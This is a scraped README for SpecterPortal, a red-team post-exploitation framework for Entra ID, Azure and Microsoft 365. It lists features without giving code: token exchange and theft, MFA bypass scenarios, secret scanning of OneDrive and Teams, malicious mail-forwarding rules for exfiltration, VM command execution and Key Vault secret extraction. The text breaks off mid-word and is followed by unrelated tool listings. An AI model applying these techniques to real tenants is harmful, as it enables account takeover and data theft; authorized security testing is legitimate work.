SpecterPortal
Advanced post-exploitation framework designed for Red Team operations in Entra ID, Azure and Microsoft 365 environments.
Install / Use
/learn @R3alM0m1X82/SpecterPortalREADME
SpecterPortal
<img width="1536" height="1024" alt="Logo Alternative Scure_remix_01kawz4dc0edtsgjw9f0f9xwv2" src="https://github.com/user-attachments/assets/04d48310-f803-4662-8625-648703a1c38e" /> <div align="center">Security Platform for Entra Cloud Token Enumeration & Reconnaissance
[#] by r3alm0m1x82 - safebreach.it [#]
Features • Installation • Authentication • Roadmap
</div>Overview
SpecterPortal is an advanced post-exploitation framework designed for Red Team operations in Entra ID, Azure and Microsoft 365 environments. Unlike basic enumeration tools, SpecterPortal provides a complete offensive platform with token management, deep content analysis, resource abuse capabilities, and privilege escalation vectors.
What makes SpecterPortal unique:
- FOCI token exchange across 36 Microsoft applications
- Permission-less Conditional Access Policy extraction
- Deep OneDrive/Teams secret scanning with pattern detection
- Azure Resource abuse (VM command execution, Managed Identity extraction etc..)
- Complete M365 operations (Email, Calendar, Teams, SharePoint etc..)
- 130+ pre-loaded Application IDs for Device Code Flow
🎥 - Watch SpecterBroker/SpecterPortal vs CrowdStrike -> https://youtu.be/Gk7cB2Tl8Qo
⚠️ Disclaimer
IMPORTANT - READ CAREFULLY
This tool is provided for educational and authorized security testing purposes only.
Legal Notice
- ✅ Authorized Use Only: Use only on systems you own or have explicit written permission to test.
- ❌ Unauthorized Access: Using this tool without proper authorization may violate the laws of your country.
Key Features
Token Management & Authentication
<img width="2492" height="1016" alt="image" src="https://github.com/user-attachments/assets/cc2cf174-a368-4b84-8b76-1baa8b41bda8" />Advanced Token Operations:
- FOCI Token Exchange: Generate tokens for 36 FOCI-enabled applications from a single Refresh Token
- Multi-Audience Generation: Create Access Tokens for Graph, ARM, KeyVault, Storage, legacy AzureAD
- Auto-Refresh Scheduler: Background service monitors and refreshes expiring tokens (configurable 5-30 min)
- Smart Deduplication: Prevents duplicate token imports via cache tracking
- NGC Token Support: Infrastructure ready for Windows Hello credentials (upcoming)
Authentication Methods:
- Device Code Flow with 130+ pre-configured Microsoft Application IDs
- ROPC (Username/Password) with MFA bypass scenarios
- Client Secret authentication for Service Principals
- Manual token import (TBRes cache, WAM Broker, raw JWT)
- SpecterBroker integration for Windows token extraction
Token Analysis:
- JWT decoding with claims visualization
- Scope and permission analysis
- Directory role detection (including Administrative Units)
- Microsoft 365 license identification
- FOCI family classification
- Expiration tracking with alerts
Search & Pattern Detection
<img width="1586" height="762" alt="image" src="https://github.com/user-attachments/assets/0222e68c-e450-4e1e-b383-cffbcaf2cdc4" />Microsoft Search Integration:
- Cross-platform search: OneDrive, SharePoint, Emails
- Advanced filtering by sender, recipient, subject, dates
- Attachment enumeration and bulk download
OneDrive Deep Scanner:
- Recursive file content analysis (not just metadata)
- Pattern detection: AWS keys, Azure secrets, API tokens, passwords, certificates
- Supported formats: TXT, JSON, XML, CSV, YAML, ENV, CONFIG, LOG
- Severity classification (HIGH/MEDIUM/LOW)
- Export findings with context and file paths
Teams Secrets Scanner:
- Message content analysis across conversations and channels
- Credential pattern detection: API keys, tokens, connection strings
- Both Graph API and Skype API support for comprehensive coverage
- Conversation metadata with participant tracking
- Image and attachment support
Custom Patterns:
- Configurable regex patterns for organization-specific secrets
- Built-in template library
- Match highlighting and context extraction
Microsoft 365 Operations
Email Management: <img width="2482" height="1006" alt="image" src="https://github.com/user-attachments/assets/1e694e74-0d8b-4c4c-a1ca-d007cf52516e" />
- Full folder access (Inbox, Sent, Drafts, Deleted, Junk, Custom)
- HTML email composition with rich formatting
- Reply/Forward with message threading
- Attachment handling (upload/download)
- Malicious Rule Injection: Auto-forwarding, keyword monitoring, data exfiltration
Calendar:
- Event enumeration with attendee details
- Meeting information extraction
- Injected event tracking
- Calendar manipulation capabilities
OneDrive: <img width="2517" height="908" alt="image" src="https://github.com/user-attachments/assets/77a5eecd-cfac-42e7-a941-771996e29c27" />
- Complete file/folder hierarchy navigation
- Upload, download, rename, delete, move operations
- Batch download with ZIP compression
- Shared file enumeration
- Permission analysis
SharePoint: <img width="2483" height="941" alt="image" src="https://github.com/user-attachments/assets/51454bdd-97b4-49a9-8463-c30da063f186" />
- Site discovery and access
- Document library enumeration
- Advanced file search
- Content download with permission validation
Teams: <img width="2182" height="924" alt="image" src="https://github.com/user-attachments/assets/3627a597-8e23-4f12-8b0a-1177671d3b28" />
- Channel and Team enumeration
- Message history retrieval (Graph + Skype APIs)
- Participant lists and presence
- Image/attachment rendering
- Private chat access
Entra ID Enumeration
Directory Intelligence: <img width="2493" height="996" alt="image" src="https://github.com/user-attachments/assets/e4ff7962-78a6-4131-8de7-290ded80e4bf" />
- Complete enumeration: Users, Groups, Devices, Contacts
- Guest account identification with external domain tracking
- On-premises sync status
- MFA status per user
- Owned Objects: User-owned apps, groups, devices
- CSV/JSON export capabilities
Application Analysis: <img width="2477" height="971" alt="image" src="https://github.com/user-attachments/assets/66d56a62-976e-4200-9d4c-e762a1c510e4" />
- App Registration enumeration with owners
- Service Principal analysis
- Managed Identity detection (System/User-assigned)
- OAuth consent grants tracking
- Permission scope analysis (Delegated vs Application)
- Client Secret & Certificate inventory with expiration tracking
- App role assignments
Privileged Access: <img width="2489" height="960" alt="image" src="https://github.com/user-attachments/assets/c42000ae-babb-452e-ba0a-14c1b3aad4b3" />
- Directory role enumeration with members
- Administrative Unit nested roles (not visible in JWT wids)
- Built-in vs custom role identification
- License tracking (E3, E5, F3, etc.)
Tenant Configuration: <img width="2484" height="1008" alt="image" src="https://github.com/user-attachments/assets/a0c9e096-080f-427e-ac02-5ce30e51335a" />
- Custom domain enumeration
- Authentication methods analysis
- Authorization Policy extraction (guest rules, default permissions)
- Security defaults status
Conditional Access Policies: <img width="2485" height="941" alt="image" src="https://github.com/user-attachments/assets/3d1fbf71-998a-40f6-9ba8-1c032507fff6" />
-
Permission-less extraction using legacy API technique
-
Complete policy enumeration without Directory.Read permissions
<img width="2495" height="807" alt="image" src="https://github.com/user-attachments/assets/1c516a27-3ef6-4fb4-8d8f-5a2836e4085e" /> -
Policy conditions: users, groups, locations, platforms
-
Grant and session controls analysis
-
Policy state identification (Enabled/Disabled/Report-Only)
Azure Resource Operations
Permission Analysis: <img width="1974" height="1011" alt="image" src="https://github.com/user-attachments/assets/0008d9ee-54ca-4144-9e87-7c13dfa4a602" />
- Role assignments per subscription (Owner, Contributor, Reader, custom)
- Resource group permissions
- Inherited vs direct assignments
- Deny assignments detection
- And more..
Virtual Machines: <img width="2196" height="335" alt="image" src="https://github.com/user-attachments/assets/16be7033-5b4d-4add-a8b8-d6364ebe740d" />
- VM inventory with status tracking
- Remote Command Execution via Run Command API
- Managed Identity Token Extraction from VM metadata endpoint
- Power operations: Start, Stop, Restart, Deallocate
- OS and configuration details
Storage Accounts: <img width="1866" height="686" alt="image" src="https://github.com/user-attachments/assets/b12fd38e-3ee1-4202-9b40-8dc5f1766889" />
- Storage enumeration across subscriptions
- Firewall rule analysis (public vs restricted)
- Anonymous blob detection for data exposure
- Service configuration (Blob, File, Queue, Table)
- Access tier and replication settings
Key Vaults: <img width="1972" height="1015" alt="image" src="https://github.com/user-attachments/assets/148e03bb-6467-4673-a1ca-37aa75e2d58a" />
- Vault enumeration with access policies
- Secret extraction (with appropriate permissions)
- Certificate download with private keys
- Key metadata and operations
- Access policy analysis per identity
Automation Accounts: <img width="2520" height="946" alt="image" src="https://github.com/user-attachments/assets/1c91c707-2502-4aed-a091-6ea4ec611d8c" />
- Runbook enume
Related Skills
product-manager-skills
34PM skill for Claude Code, Codex, Cursor, and Windsurf: diagnose SaaS metrics, critique PRDs, plan roadmaps, run discovery, and coach PM career transitions.
devplan-mcp-server
3MCP server for generating development plans, project roadmaps, and task breakdowns for Claude Code. Turn project ideas into paint-by-numbers implementation plans.
